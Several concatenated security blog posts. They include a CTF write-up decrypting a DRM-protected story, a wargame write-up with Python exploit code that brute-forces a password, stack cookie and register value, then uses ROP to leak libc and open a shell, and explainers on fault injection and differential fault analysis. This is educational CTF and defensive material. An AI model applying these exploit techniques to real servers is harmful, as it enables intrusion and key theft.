For this challenge, we were provided with a drmless.tgz file containing a few things:

- .drmlicense : A 16 byte file with some hexadecimal contents
- cool_story.enc : A 'cool story' encrypted.
- cooler_story.enc : An even 'cooler story' also encrypted.
- drmless : an ELF binary.
- readme.txt : challenge instructions.

If we read the instructions, we see the following text:

Here's a cool story from PPP! We wrote an even cooler story, but you need to pay us if you want to unlock it. TEN THOUSAND DOLLAR.

If we run 'drmless cool_story.enc' after extracting the archive on a 32 bit Linux machine we get a nice decrypted file. If we attempt to do the same on the cooler_story.enc file, we are told that this is a binary file and asked whether we want to view it anyway. Sounds like the 'less' program, doesn't it?

So we have a file we can decrypt, and one we cannot. The objective is to decrypt the other one, presumably by altering the drmlicense or bypassing it in some way. Let's look at the binary to find out what's going on.

At startup, the binary loads the .drmlicense file and reads 16 bytes into the 'license' global buffer:

```
v2 = getenv("HOME");
snprintf(&v27, 1024, "%s/.drmlicense", v2);
v3 = open((const char *)&v27, 0);
if ( v3 >= 0 || (v3 = open("/.drmlicense", 0), v3 >= 0) || (v3 = open("./.drmlicense", 0), v3 >= 0) )
{
read(v3, license, 16);
close(v3);
}
```

If we search for cross-referneces to license, we see it is only used in the 'undrm' function, which looks like this:

```
int __cdecl undrm(int a1)
{
int result; // eax@1
aes_wb_decryptor(a1, a1);
result = 0;
do
{
*(_BYTE *)(a1 + result) ^= license[result];
++result;
}
while ( result != 16 );
return result;
}
```

So apparently 'drmless' uses this aes_wb_decryptor function to decrypt the data, and then XORs it with the license. It is interesting to note that only the input buffer is passed to the decryptor, which means that it either uses a hardcoded key or it is stored in some global variable.

Also, it is interesting to note that the name indicates this is probably a whitebox implementation. This means the implementation is obfuscated in an attempt to withstand static/dynamic analysis, and most likely the key is mixed into the algorithm itself in some way.

In any case, I have read documentation on whitebox cryptography before, and also analyzed some implementations of it. Based on that experience, I had some ideas on how to approach a whitebox implementation, but I also knew that I should probably focus on the stuff around the whitebox before diving into the whitebox itself.

Just for fun, I look at the implementation and quickly saw that each round of AES is splitted into several functions, and they are all called sequentially.

```
.text:0829FF19 loc_829FF19: ; CODE XREF: aes_wb_decryptor+7089j
.text:0829FF19 ; aes_wb_decryptor+7094j ...
.text:0829FF19 mov eax, [ebp+var_24]
.text:0829FF1C call r013
.text:0829FF21 mov [ebp+var_59], al
.text:0829FF24 mov eax, [ebp+var_30]
.text:0829FF27 call r020
.text:0829FF2C mov [ebp+var_7B], al
.text:0829FF2F mov eax, [ebp+var_2C]
.text:0829FF32 call r021
.text:0829FF37 mov [ebp+var_7A], al
.text:0829FF3A mov eax, [ebp+var_28]
.text:0829FF3D call r022
.text:0829FF42 mov [ebp+var_79], al
.text:0829FF45 mov eax, [ebp+var_24]
.text:0829FF48 call r023
.text:0829FF4D mov [ebp+var_78], al
.text:0829FF50 mov eax, [ebp+var_30]
.text:0829FF53 call r030
```

I also saw no global key seems to be input to the algorithm, so I started treating it as a decryption oracle and turned into the more interesting XOR with the license and its possible implications.

The first thing I did was looking for cross-refs to 'undrm'. I found it is used in the 'drmprotected' function to decide whether a file is DRM-protected or not:

```
signed int __cdecl drmprotected(int a1)
{
int v1; // ebx@4
int v2; // eax@5
char v4[16]; // [sp+10h] [bp-48h]@4
char v5; // [sp+20h] [bp-38h]@4
char v6; // [sp+30h] [bp-28h]@4
char v7; // [sp+40h] [bp-18h]@4
if ( !old_bin_file(a1) || !seekable(a1) || lseek(a1, 0, 0) == -1 )
return 0;
v1 = read(a1, v4, 64);
undrm((int)v4);
undrm((int)&v5);
undrm((int)&v6);
undrm((int)&v7);
if ( v1 > 0 )
{
v2 = 0;
if ( v4[0] < 0 )
return 0;
while ( 1 )
{
++v2;
if ( v1 <= v2 )
break;
if ( v4[v2] < 0 )
return 0;
}
}
return 1;
}
```

This just decrypts the first 64 bytes of a file and performs some checks on it. If the checks pass, the function returns 1, otherwise it returns 0. At this point I strongly suspected this was all the protection that was to be found. So I decided to set my drm license to all-zeros, force the 'drmprotected' function to return 1 and dump the data into a file.

I did this using this vtrace script and running it with the cool and the cooler story. The script still requires you to go through the whole output by pressing 'space' until reaching the end, in the same way you'd navigate through a file with 'less'.

```
sfx@deb:~/drmless/$ python drmless.py cool_story.enc cool_story.dec
sfx@deb:~/drmless/$ python drmless.py cooler_story.enc cooler_story.dec
```

After this, I used xortool from Hellman to analyze the output files. When run with the 'cool story' it lead to the original .drmlicense contents... so I ran it against the cooler story and used the resulting key to decrypt the output:

```
sfx@deb:~/drmless/xortool-master$ python xortool.py -l 16 ../cool_story.dec -c 20
1 possible key(s) of length 16:
\x00\x11"3DUfw\x88\x99\xaa\xbb\xcc\xdd\xee\xff
Found 1 plaintexts with 95.0%+ printable characters
See files filename-key.csv, filename-char_used-perc_printable.csv
sfx@deb:~/drmless/xortool-master$ python xortool.py -l 16 ../cooler_story.dec -c 20
1 possible key(s) of length 16:
\xfe\xed\xa1\x07\x0f\xf0\rp\xde\xad\xbe\xef\xfa\xceUU
Found 1 plaintexts with 95.0%+ printable characters
See files filename-key.csv, filename-char_used-perc_printable.csv
sfx@deb:~/drmless/xortool-master$ cd ...
bash: cd: ...: No such file or directory
sfx@deb:~/drmless/xortool-master$ ls
args.py args.pyc colors.py colors.pyc libcolors.py libcolors.pyc README.md routine.py routine.pyc tests xortool_out xortool.py
sfx@deb:~/drmless/xortool-master$ cd ..
sfx@deb:~/drmless$ ls
cooler_story.dec cool_story.dec drmless master.zip story.dec util.pyc
cooler_story.enc cool_story.enc drmless.py readme.txt util.py xortool-master
sfx@deb:~/drmless$ python
Python 2.7.3 (default, Mar 5 2013, 01:19:40)
[GCC 4.7.2] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import util
>>> x = open('cooler_story.dec').read()
>>> key = "\xfe\xed\xa1\x07\x0f\xf0\rp\xde\xad\xbe\xef\xfa\xceUU"
>>> y = util.repxor(x,key)
>>> y[:100]
'TWELFTH NIGHT; OR, WHAT YOU WILL\r\n\r\nby PPP\r\n"freeShakespeare_downWithDRM"\r\n\r\n\r\n\r\nPERSONS REPRESENTED'
>>>
The key is: freeShakespeare_downWithDRM
```

So here it is, 250 points

]]>In this post, I will summarize my presentation and provide links to additional reading material and, when possible, open source software/hardware references.

Traditional embedded systems are awfully insecure in a hostile environment: they usually run unauthenticated code from flash/rom memories, contain a JTAG debugging interface allowing runtime control, etc. In addition to the lack of runtime protection, traditional systems store data in flash-like memories either in the clear or encrypted with a key that you can also find in the firmware.

Thus, in this scenario both data and code integrity and confidentiality can be easily compromised by an attacker with access to the device. Modern systems are most usually based on a complex System On Chip solution as shown in this figure:

In such a system, several techniques are used in an attempt to solve these security challenges:

- Secure Boot: this mechanism refers to a device that boots from internal code (e.g. an internal boot ROM) and performs some kind of authentication of the firmware to be loaded on the device. Obviously, for this to work the system needs to guarantee that the internal boot ROM cannot be easily tampered with and that code is properly authenticated.

- Secure data storage: in order to protect sensitive data, modern devices often include a secure storage in the form of some internal flash or One-Time-Programmable (OTP) memory. Access control rules are implemented on this storage in order to ensure sensitive data is only accessible to those parts of the chip that require it.

- Key stores: As a specialization of secure data storages, key stores allow the system to securely store cryptographic keys. Often these stores allow the main CPU to write keys into them and to instruct the on-chip cryptographic coprocessors to use them. Therefore, in this way keys remain secret even if one achieves runtime control of the system.

- Memory protection: Many modern systems implement a protection mechanism for their main DRAM memory. In order to avoid attackers from reading data off RAM chips, sniffing the bus or modifying the data easily, they implement DRAM scrambling / encryption mechanisms. These mechanisms are usually quite weak due to timing restrictions, but nonetheless pose some barrier to the attacker.

- Debug interface protection: In addition to the above, debug interfaces such as JTAG are not (supposed to be) left open on secure systems. Since usually the system developer wants to be able to debug the target during development time and in case of errors, the most common solution involves setting up a password protection scheme.

Thus, the JTAG interface is usually *locked* until a password/key is presented in some way. This can be either a hardcoded key, device-specific key, or even a challenge-response protocol.

The remainder of the presentation (and thus this post) focuses on how to get to these secret keys starting from a device implementing all these mechanisms.

Of course, depending on how well these mechanisms are implemented, it might be very well possible to achieve this by means of logical attacks (e.g. overflows, improper bound checking, etc.).

However, for the sake of argument we are going to assume that this is not possible and see what we can do at the more physical/hardware level.

**Step 1: Achieving runtime control**

Say we have no easy external interface providing unauthenticated data to the target that we can exploit (i.e. no browsers, no networking, no filesystem parsing... ).

What do we do? If you have been reading this blog before, you probably know I am thinking about fault injection. As I described in that post, we can make a device fail by bringing it just outside its normal operating conditions. This can be achieved by modifying the voltage supply to introduce short glitches (aka VCC glitching), by injecting optical energy (laser/optical fault attacks), EM energy, etc.

Now, if we time our faults precisely at the moment when the internal BootROM is verifying the integrity of external code, we might be able to bypass it and run unauthenticated code.

In absence of specific countermeasures, it is almost always possible to achieve this. Therefore, it is important to implement appropriate protection and detection mechanisms in order to guarantee the integrity of boot code. See this post for references on how to do this.

Also, keep an eye on Die Datenkrake, which promises an open source hardware and software design that can be used for fault injection purposes amongst others.

**Step 2: Getting to the keys**

So once we have runtime control of the target, we are usually allowed to encrypt/decrypt data at will. However, what we really want is to obtain the key so we can share it with our friends, sell it to the highest bidder, or just post it on twitter *for the lulz*.

So again, if we cannot find an easy way to obtain the keys through logical means, we will resort to side channel information. We can do this in two ways: by monitoring the chip or by injecting faults on it.

**Step 2.a : Keys through side channel information**

When a chip is functioning, information about its operation is leaked to the surrounding environment. Think of it as hearing stuff that you are not supposed to be hearing (e.g. what your neighbours where doing last night ).

Even though you are not supposed to hear it, you actually do hear it. So you know what they are doing, and you make assumptions about what's happening in there.

The same happens with chips. When a chip is functioning, it takes more or less energy from the power supply depending on what it is doing. It also takes more or less time to compute, creates stronger or weaker EM signals (remember tempest?) around it or emits tiny photons depending on the activity it is carrying out.

Now, this activity is of course related to the process it is performing (e.g. encrypting some data) but also to the data it is using (e.g. input data, keys, output data...).

So what you do is you ask the chip to use that precious key he is not willing to show to you, and you monitor it while it is doing so. Kind of like the polygraph tests three-letter-agencies like to perform on super-bad terrorists.

How do we link this to the keys you are asking? Here is the trick: we ask the chip to perform lots of operations with the key using random input data. At the same time, we record side channel traces (let's say power consumption traces, using an oscilloscope).

Now, due to the fact that the power consumption is linked to the data used for the computations (and thus the key), we will use statistics to find out what the key is. What we do is we split the key in small chunks used by the algorithm (e.g. in DES 6 bits of key are mixed with 6 bits of data and fed into the S-boxes).

We refer to these internal results as intermediate values, and we create a model of how these values will leak to the power consumption. For instance, we assume that the Hamming Weight of these values is leaked in the power consumption. This means that whenever these values are computed, the consumed power varies depending on their HW (and probably also other variables).

Now, since there is a dependency between the intermediate values and the power consumption, we can use statistics to find out the amount of dependency. Since those intermediate values depend on small chunks of key, we can try all the possibilities and find out how much statistical dependency there is between the power traces and those intermediate values. The key guess showing more statistical dependency will probably be the correct key.

If we repeat this process for all the key chunks, then we obtain the whole key. Now you might be asking... how do I do this at home? Well, if you are a security test lab you can buy products like Inspector (from my employer ;-p ) or CRI Workstation.

But if you are not, you can take a look at this page which contains information from a presentation delivered at BlackHat EU 2013: http://www.newae.com/blackhat. You can also take a look at OpenSCA, a Matlab-based framework for side channel analysis.

**Step 2.b: Getting keys through fault injection**

So as I said above we can also get keys through fault injection. Depending on how the system is designed, it might be possible that the memory cells containing the keys are actually mapped in the memory space of the system.

In those cases, an access control mechanism is placed in between the bus initiators and the bus target (i.e. the memory itself) in order to identify whether the request is allowed or not.

As you can imagine, glitching this access control check would result in access to the secret keys for initiators that should otherwise have no access to them.

But sometimes you won't be *as lucky* and you won't have the ability to request a read of the key (even if it was denied) and attempt to bypass the access control checks... simply because the key is not mapped anywhere in memory.

What do you do then? DFA is the answer, my friend. With Differential Fault Analysis you can inject faults into the cryptographic algorithm itself, and by observing the changes in the output you can recover the secret keys. See this post for more information.

**Conclusion and further reading**

As you can see, when a device is under the control of an attacker (aka user in some cases ;-p ), there are a number of attacks that need to be considered in addition to the usual software/logical vulnerabilities.

By abusing environmental variables such as power/energy supply and consumption, radiation, etc. one can exploit hardware that would otherwise be secure.

Therefore, as an embedded system designer it is important to protect your code and hardware. Even in the presence of countermeasures, it is critical to test those countermeasures and verify that they actually do what you intended them to do (the company I work for can help you there ).

In order to protect against SCA attacks, you need to make the environmental variables statistically independent of your secret data or hide that dependency somehow. You must know that most countermeasures are covered by CRI's patents, so you might want to check with them before you implement them in your products.

In order to protect against fault injection, you need to introduce redundancy in your computations and make your software AND hardware resilient to induced errors. You can take a look at this paper for some ideas on how to do this at the application level.

Additionally, for more reading material on the subjects you can take a look at CHES (mostly side channel analysis) and FDTC (mostly fault injection) from the last couple of years. The DPA book is also a very good read with lots of background information on DPA attacks.

Of course, if you have any concrete inquiries you can address me in the comments, on twitter or elsewhere.

]]>Now, level04 was slightly more difficult. It is a web server compiled with stack cookies (SSP), position independent code (PIC/PIE) and configured to run with ALSR and NX. So this gives us a few protections we need to bypass or work around somehow.

Because of this, I thought it was interesting to share and maybe request some feedback... who knows, maybe there are easier solutions and I am just complicating my life You can also find a copy of this post at int3pids.com.

Additionally, the web server generates a random password which you need to provide in order to hit the vulnerability and control the instruction pointer. Looking at the validate_credentials function, we see this code:

```
int validate_credentials(char *line)
{
char *p, *pw;
unsigned char details[2048];
int bytes_wrong;
int l;
struct timeval tv;
int output_len;
memset(details, 0, sizeof(details));
output_len = sizeof(details);
p = strchr(line, '\n');
if(p) *p = 0;
p = strchr(line, '\r');
if(p) *p = 0;
// printf("%d\n", strlen(line));
base64_decode(line, strlen(line), details, &output_len);
// printf("%s -> %s\n", line, details);
// fflush(stdout);
p = strchr(details, ':');
pw = (p == NULL) ? (char *)details : p + 1;
for(bytes_wrong = 0, l = 0; pw[l] && l < password_size; l++) {
if(pw[l] != password[l]) {
#if 0
char *buf;
asprintf(&buf, "[%d] wrong byte (%02x vs %02x)\n", l,
password[l], pw[l]);
write(58, buf, strlen(buf));
#endif
bytes_wrong++;
}
}
// anti bruteforce mechanism. good luck ;>
tv.tv_sec = 0;
tv.tv_usec = 2500 * bytes_wrong;
select(0, NULL, NULL, NULL, &tv);
// printf("%d bytes wrong!\n", bytes_wrong);
if(l < password_size || bytes_wrong)
send_error(401, "Unauthorized",
"WWW-Authenticate: Basic realm=\"stack06\"",
"Unauthorized");
return 1;
}
```

So there is a clear timing leak on line 208 which tells you how many bytes were wrong. Additionally, the base64_decode function seems to take the length of the output buffer but then this is what it does with it:

```
void base64_decode(const char *data,
size_t input_length,
unsigned char *output,
size_t *output_length) {
if (decoding_table == NULL) build_decoding_table();
// printf("data: %p, input_length: %d, output: %p, output_length: %p\n",
// data, input_length, output, output_length);
if ((input_length % 4) != 0) {
// printf("len % 4 = fail\n");
return;
}
*output_length = input_length / 4 * 3;
```

So, it just overwrites it with the computed output buffer and goes ahead and decodes it. Thus, we have a stack based buffer overflow but in order to exploit it we first need to recover the random password so that the function returns and uses the pops the return address off the stack.

Discovering the password is fairly easy thanks to the timing leak: we just brute force byte by byte, measuring the time to see if we found the right character or not. In my case, the timing difference is below 0.001 when we hit a good value and above it when we do not, so I just check for that:

```
def check_password(s, password):
req = "GET / HTTP/1.0\r\nAuthorization: Basic %s\r\n\r\n" % base64.b64encode("stack06:"+password)
s.send(req)
resp = ""
resp = resp + s.recv(1024)
auth = "Unauthorized" not in resp
return (auth, resp)
# First find auth password
def find_next_char(password):
done = False
for current_char in string.ascii_letters+string.digits:
s = get_connection(ip,port)
t0 = time.time()
found,resp = check_password(s, password+current_char)
t1 = time.time()
s.close()
#If found or time indicates current char is good...
if found or (t1-t0) < 0.001:
print "[*] Found character %d = %s" %(len(password)+1,current_char)
return (found,password+current_char)
return (False,password)
def find_password():
password = ""
found = False
while(not found) and len(password)<16:
(found,password) = find_next_char(password)
return password
```

So this piece will find us the password. What's next? Well, we can use this to overwrite some data and hopefully hijack EIP. But... as I mentioned above, there is a catch: there is a stack cookie protecting EIP.

Since we can feed any binary data of any size (thanks base64 decode ), we can brute force the stack cookie byte by byte. When we see a stack corruption, we guessed an incorrect value. When the program goes on normally, we hit the right result. Again, this is the code implementing that part:

```
def find_cookie(password,cookie = ""):
while len(cookie)!=4:
for i in xrange(256):
# print "[*] Test ", i
s = get_connection(ip,port)
found,resp = check_password(s,password + "A"*2024+ cookie + chr(i))
if "smashing" not in resp:
# print resp
cookie = cookie + chr(i)
print "[*] Cookie value is 0x%s" % cookie.encode("hex")
break
else:
print resp
s.close()
return cookie
```

At this point, we can reliably set EIP since we know the stack cookie value. However, that's not very helpful since everything is randomized thanks to full ASLR and a PIC binary. The first thing I tried here was overwriting the last byte of the saved EIP to land on a call to printf() or some other function returning data. This would help me obtain some data from the stack, and then I could create a ROP payload based on the leaked data.

However, then I hit another problem: ebx is used by the code to contain a reference to the binary loading address + some offset. This is done to achieve position independent code. Unfortunately, the exploit also overwrites ebx, which was stored by validate_credentials just between the stack cookie and the return address.

So what I did next was guessing ebx in the same way I did for the stack cookie. However, here I started with the known last byte (the lowest 12 bits of the binary are not randomized) and brute forced the rest. Again, the code is very similar to the previous one:

```
def find_ebx(password,cookie):
ebx = ""
s = get_connection(ip,port)
found,base_resp = check_password(s,password + "A"*2024+ cookie + "AAAA"*3)
s.close()
while len(ebx)<4:
for i in xrange(0,256):
try:
s = get_connection(ip,port)
found,resp = check_password(s,password + "A"*2024+ cookie + "AAAA"*3 + ebx + chr(i) )
s.close()
if resp == base_resp:
ebx = ebx + chr(i)
print "[*] ebx value is 0x%s" % ebx[::-1].encode("hex")
break
except socket.error:
# print "[*] Fail"
pass
if i==255:
print "[*] Could not discover ebx value. Exploit failed."
sys.exit(-1)
return ebx
```

This code first obtains a 'normal response'. Next, it starts bruteforcing ebx byte by byte, comparing the response with the 'expected response'. If it matches, the right value was found, else it iterates to the next candidate.

Now, with this done we are able to compute the base for the binary by subtracting 0x4118 from the leaked ebx value. After finishing the exploit I realized that this was actually not needed, since the stack smashing detection code prints out a very helpful memory map into stderr, which is redirected to our socket. Anyway, with this code the exploit doesn't rely on that leak so it would work even if stderr is not redirected to our socket.

At this point I had two options: use this to leak the libc or make a ROP payload based on the binary. Since I already had a payload for libc made with help of ROPGadget (which I had to correct due to some bug by the way), I decided to return into write and leak the first GOT entry to obtain the libc base. Therefore, the final stages of my exploit look like this:

```
base = struct.unpack("<I", ebx)[0] - 0x22FF - 0x1E19
write_plt = struct.pack("<I",base + 0xF30 ) #write PLT entry
got_base = struct.pack("<I",base + 0x4124 ) # GOT start
print "[*] Binary base: 0x%.8x . Leaking libc base" % base
print "[*] PLT entry for printf @ ", write_plt[::-1].encode('hex')
print "[*] GOT start @ ", got_base[::-1].encode("hex")
s = get_connection(ip,port)
found,resp = check_password(s,password + "A"*2024+ cookie + "AAAA"*3 + ebx + "AAAA"*3 + write_plt + "AAAA" + "\x01\x00\x00\x00" + got_base + "\x04\x00\x00\x00")
s.close()
libc = struct.unpack("<I", resp[:4])[0] - 0xd3a70
print "[*] Discovered libc base: 0x%.8x" % libc
print "[*] Launching ROP exploit"
p = get_rop(libc)
s = get_connection(ip,port)
found,resp = check_password(s,password + "A"*2024+ cookie + "AAAA"*7 + p)
```

After this, a nice shell is running for us. With only one catch: an alarm is set by the webserver, and it will trigger a SIGALRM signal soon. So what I do is just executing trap '' SIGALRM; as a first command so that the signal is ignored. The full exploit code is here for you to play with

Even in the presence of quite some countermeasures (fully randomized addres space, non-executable data areas, stack smash protection), it is still possible to achieve reliable code execution.

In this case, we have abused the fact that the vulnerable server does not call execve() for every new child to brute-force the stack cookie and also to discover the base address of the executable itself. After this is done, it is basically game over.

However, these techniques have two requirements: the address space has to remain constant between requests (albeit random every time we restart the whole server) and we need to be able to partially corrupt the data with fully arbitrary values. If these requirements were not met, another info-leak bug would have been required in order to obtain this data.

Thus, as an application programmer it is always recommended to call fork()+execve() instead of just fork(), so that the OS re-randomizes the whole address space.

]]>In that post, I explained how to extract keys from cipher implementations assuming we could *somehow* inject faults during the execution of the cipher. Besides DFA attacks, I also said we could achieve something similar to what we do with software protections (i.e. modifying control flow, bypassing checks, etc.) using fault injection techniques. I thought it was worth giving a few examples of how to inject faults in real hardware to complete the picture.

When hardware is designed, it is engineered to work under certain conditions of temperature, input voltage ranges, clock frequencies, etc. The hardware is tested under those conditions and is supposed to function in that range... and there are no guarantees that it will operate correctly if you bring it outside them.

I guess you follow my reasoning already So if we want to inject faults into hardware, a good place to start looking is exactly in those *gray areas* around the operating conditions. Of course, we want the chip to be functioning properly most of the time, and we want it to fail at the precise moment at which it is computing something sensitive (say a secure boot check, or an RSA-CRT signature). Thus, we probably need to have some control over the timing, and inject the fault only temporarily.

In this post I am introducing from an intuitive perspective three ways of injecting faults: voltage, clock and laser/optical glitching.

**Voltage glitching**

The first example I want to touch on is that of *voltage (or VCC) glitching**.* In this case, we typically run the chip at its nominal voltage (say 3.3V), and whenever we want to inject a fault, we drop voltage down to e.g. 1V.

At this moment, the input voltage to certain gates within the chip will be too low due to the lack of supply voltage. Thus, these gates will receive an input voltage which is below the threshold that indicates whether the signal is a zero or a one, no matter what value it was supposed to be.

Then we increase the voltage again to the nominal voltage of 3.3V, and we have a functioning chip that just failed to execute one of its operations. For instance, it failed to execute a conditional jump and fell through to the code that we wanted to have executed.

The trick here is to find the proper parameters for the glitch: voltage drop (do we go to 0V, to 0.4V, to 1V ...), length of the glitch (a few nanoseconds, a few microseconds?) and the timing. Typically, if voltage drop and length of glitch are too small, the chip will function properly. If they are too large, it will just *die* (mute, reset, or maybe even physically damaged). Of course, if the timing is wrong then the attacker will never see the effects he wants to see.

As a protection against this kind of glitching, most modern smart cards and some embedded devices incorporate voltage sensors that detect whether the voltage went below a certain value or not. However, this attack is still effective against a wide range of products.

**Clock glitching**

*Clock glitching* is similar to VCC glitching in the sense that it affects another critical parameter of the chip that can be controlled by the attacker. In this case, what we do is injecting spurious clock cycles that are way shorter than the original clock cycle.

Since the internal logic of the chip operates based on its clock, a short clock cycle will trigger a new operation before the results of the previous one were completely computed or propagated through the device.

Imagine you have to multiply two values, and then add a third value to them. Normally, multiplying values takes longer than adding them up. Thus, the clock frequency for a chip that only performs these two operations would be long enough for the multiplication to occur and its result to be ready at the input of the next stage, since that is the critical operation.

Now, if I tell you to start adding up before you received the multiplication result, you will be using invalid (old?) data instead of the correct result. Thus, you will fail at computing the correct result.

Clock glitching exploits exactly that situation. Again, finding the right parameters in this case is the key to success.

As for hardware level protections, frequency sensors as well as using internally generated clocks (using on-die oscillators) are generally the most common ways to protect against clock glitching.

Additionally, fast clocks make these attacks less practical for attackers, since they need to inject even faster clock cycles and synchronize their attack at a higher speed.

This is why clock glitching is less effective nowadays: most high-end smart cards use their own on-die clocks, and embedded systems require much higher clock speeds.

**Optical glitching**

After clock and VCC glitching, we move to the real *king* of current fault injection attacks. Optical fault injection, or most commonly Laser fault injection, uses a light beam to inject faults into semiconductor devices.

How is this possible? Well, light (physicists, don't kill me!) basically consists of a number of photons carrying a certain amount of energy. Roughly, when these photons reach a semiconductor (typically silicon in electronic devices), their energy is absorbed by the semiconductor.

Given enough energy, electrons that would otherwise be still within the semiconductor will start to move, creating current. So, for our chips, this means that some of the transistors in the chip will actually switch when they should not!

The big difference between this fault injection technique and the previous ones is that in this case we actually have spatial selectivity (or resolution): we can choose which parts of the chip we attack by pointing the laser beam to them.

Of course, this is very powerful but at the same time it adds extra complexity to the attack: now you need to find the sensitive spots in the chip. As before, there are a number of parameters one needs to play with in order to successfully inject faults: glitch timing, glitch length, wavelength of the injected light and amount of energy injected.

Also, this attack is semi-invasive: we need to open up the chip package so that the light radiation can reach the die. Otherwise, the light will be blocked by the package or the plastic around the smart card die. Thus, this attack provides additional power at the cost of additional complexity, as usual.

In terms of hardware level protections, this is also the most difficult attack to prevent. Typically light sensors are scattered around the chip, but manufacturers cannot place sensors everywhere (that's expensive!) so there is always open spots.

At the end of the day, fault injection protection requires a combination of hardware and software prevention and detection mechanisms: typically sensors at the hardware level and double-checks and redundancy at the software side.

Due to the difficulty of completely preventing this kind of attacks, fault injection attacks are nowadays one of the main threats to secure hardware. Additionally, this difficulty together with the physical nature of the attacks also means that simulating them is typically not enough to assure appropriate protection levels, making fault injection testing key for secure hardware.

]]>Differential Fault Analysis (DFA) attacks are part of what is known as fault injection attacks. This is, they are based on forcing a cryptographic implementation to compute incorrect results and attempt to take advantage from them. With fault injection attacks (also often called active side channel attacks) one can achieve things like unauthenticated access to sensitive functionality, bypassing secure boot implementations, and basically bypassing any security checks an implementation performs.

With DFA attacks, one is able to retrieve cryptographic keys by analyzing correct/faulty output pairs and comparing them. Of course, this assumes you are able to inject faults somehow... which is often true in hardware implementations: gaming consoles, STBs, smart cards, etc. At the software level, one can achieve similar things by debugging the implementation and changing data or by patching instructions... but this is something we have been doing for a long time, haven't we? I often say that fault injection attacks are the analog version of *'nopping'* instructions out in a program, although we often do not know exactly what kind of faults we are injecting (i.e. we often miss a fault model, but we still successfully attack implementations in this way).

There are ways to protect against this kind of attack as an application programmer, but this is not the objective of this post. In the remainder of this post, I will explain two powerful DFA attacks on two modern cryptographic algorithms: RSA and (T)DES. For some information on protecting from these attacks as a programmer, take a look at these slides. If there is some interest, I will outline the most common techniques to perform fault attacks in a future post.

**DFA on RSA-CRT**

I've explained this one a number of times, and I even posted a challenge I created for CP Europe, but the attack itself I only explained in Spanish. So we know RSA uses big big numbers and performs a modular exponentiation over them. However, modular exponentiation algorithms tend to be expensive in computing time so people try to find ways to make them faster. In any case, most implementations have an execution time that is linear with the key size, which means that when you double the key size the exponentiation time doubles as well.

This is where RSA-CRT comes *to the rescue*. This way of implementing RSA is based on splitting the exponentiation in two halves. For this, they make use of the Chinese Remainder Theorem, which basically says that you can compute a result modulo by splitting it into two computations modulo p and q respectively.

So, in RSA we need to compute , but what we actually do is computing intermediate results modulo p and q and then combining them. So we compute and , and we combine them to obtain the whole result like this:

Now, imagine you are able to modify one of the two exponentiations, for instance you modify and get instead. Now, if we subtract the two results, c and c', we get the following:

Obviously, many of these terms are the same on both sides, and thus we can simplify this result a lot:

And, oh surprise, this number is a multiple of one of the primes. Thus, if we compute the Greatest Common Divisor of c-c' and n, we obtain the common factor p. From there we can compute the other prime, q, by just dividing n/p. And with this we know all the information we need to obtain the private key d. This attack is referred to as the Bellcore attack, due to the fact that it was published by Bellcore labs in 1996, and is a deadly attack against RSA implementations using CRT and not protecting themselves sufficiently.

There are also other DFA attacks on other implementations of RSA, however they are more difficult to understand and require many more faults than the attack outlined here. If you are interested, I'm sure you can find many examples in the literature. Otherwise, feel free to contact me

**DFA on (Triple)DES**

As a second example, I will quickly describe how DFA attacks on DES work, so that you do not have the impression that only RSA is vulnerable to this kind of attacks. Let's first remind how a DES round looks like:

Where the F function looks like this:

Now, imagine you are able to know the input/output pair of the F function. Since the key is used only 6 bits at a time, you can easily try out each one of the 8 sub keys (64 possibilities for each of them) and find whether the related output bits match or not. This only requires 8 6-bit bruteforce attacks (9 bits in total) to obtain the whole round key. Obviously, this is not possible... that's precisely why you XOR it with the other half of the state and add more rounds to the algorithm: you don't want people to be able to break it so easily!

However, let's assume we can inject a fault in the input of this function for the last round (or a fault during the execution of the previous round, which leads to the input of the function for the last round).

Now, from the output of the algorithm, we can obtain two pairs of inputs to the F function: correct and faulty inputs.

Additionally, the other two halves give us the result after the XOR for the two executions: good and bad execution. However, the value that has been XORed with them is computed during round 14 (i.e. two rounds before the end) and has not been affected by our fault injection attack.

Thus, this value is unmodified, and if we XOR the two left halves we get the difference between the good and the faulty output of the F function. So, we have:

- Correct input

- Faulty input

- XOR of correct and incorrect output

Now, remember that I said that only 6 bits of the key are used each time. And they pass through the S-boxes, and then they go into the P permutation. Now, since we have these input/output relations, we can use the correct and incorrect inputs, XOR them with a 6 bit key guess and perform the S-box lookup.

Then we XOR these two results, and we have the output difference as well. It turns out (and here is the magic) that thanks to the S-box structures only a few values for the sub key will match. Thus, this allows us to reduce the entropy of the key.

If we repeat this a few times, then we can reduce the list of possible keys to one. Or alternatively, we can give *a point* to each key that matches at every attempt. Then we get a number of these faults, perform this process for each of them, and then check the highest score: this is our key.

If you repeat this process with round 15 instead of 16, then you get enough information for a full DES key. If you have Triple DES, then you need to move over to the inner DES and repeat these two steps again. Alternatively, if input and output to the DES/TDES are known you can stop when you still miss the last round key, and bruteforce the last portion of it (just 8 bits).

**Final thoughts
**

As I said before, not only DES and RSA are susceptible to DFA attacks. In the literature, one can find several DFA attacks for AES, Camellia, elliptic curve implementations, etc.

For an application running under the control of an attacker (being it a hardware implementation such a smart card or other types of implementations) it is important to apply adequate countermeasures in order to protect the keys.

State-of-the-art countermeasures at the software level typically include double-checking results, adding time variation to the algorithm so that the attacker cannot predict the point of injection and in general adding redundancy in order to detect the attacks and react accordingly.

Hopefully this post helps raise awareness on this kind of attacks Any feedback is more than welcome!

]]>**Elliptic Curves**

If we are talking about Elliptic Curve Cryptography, first we need to define what an Elliptic Curve is. Mathematically, an Elliptic Curve is a curve with the following equation:

This means that every point (x,y) for which the above expression is met will be part of the curve. However, it turns out in our case we can simplify the equation because the curves we'll be using can generally be written as:

Such a curve, over the reals (i.e. x and y are real numbers) and with a=-3, b = 1, looks like this:

What makes these curves special is that we can define an abelian group with them. To do that, we define the point at infinity and an addition law. The addition law is depicted in the following picture from Wikipedia:

As you can see, if you want to add two points P and Q, you draw a line through them. The intersection of this line and the curve is the point -(P+Q). Then, you just need to invert this point (negate the y coordinate) to obtain the final result.

Of course, we have special cases. If the point is added to itself, the line is defined as the tangent to the curve at that point, as intuitively the tangent touches 'two times' the point.

If we add a point to its inverse, we get a vertical line... and that's a problem because it will never touch the curve. Here is where the point at infinity comes to rescue. The point at inversity is simply 'up there' (and 'down there'), and is the zero element of the group.

**Elliptic Curves for Cryptography**

